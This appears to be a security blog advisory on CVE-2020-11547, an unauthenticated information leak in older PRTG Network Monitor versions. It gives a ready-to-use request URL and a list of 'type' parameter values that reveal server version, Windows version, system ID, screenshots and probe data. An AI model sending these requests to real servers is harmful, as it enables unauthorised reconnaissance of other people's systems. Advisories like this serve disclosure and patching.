PRTG-Network-Monitor-Information-Disclosure

Overview :
PRTG Network Monitor before 20.1.57.1745 allows remote unauthenticated attackers to obtain information about probes running or the server itself (CPU usage, memory, Windows version, and internal statistics) via an HTTP request, as demonstrated by type=probes to login.htm or index.htm.

CVE-2020-11547

PRTG-Network-Monitor-Information-Disclosure

Remote unauthenticated user can craft an HTTP request in /public/login.htm or /index.htm by providing the ‘type’ parameter.

Example: http://127.0.0.1/public/login.htm?type=cpuload

replace cpuload by any of the following to get diferent info

  • version
  • cpuload
  • dnsname
  • serverhttpurl
  • windowsversion
  • systemid
  • treestat
  • memory
  • requests
  • screenshot
  • lastsync
  • probes
  • warnings

Facebook
Twitter
LinkedIn

Recent Blog Posts

Best Intrusion Detection Systems (IDS) to Use in 2025
Top 5 Cybersecurity Risk Management Strategies for 2025
Top 5 Emerging API Security Threats in 2025
8 Best Security Operations Center (SOC) Providers for 2025
Top 7 Cloud DDoS Protection Providers for 2025

WAF Solution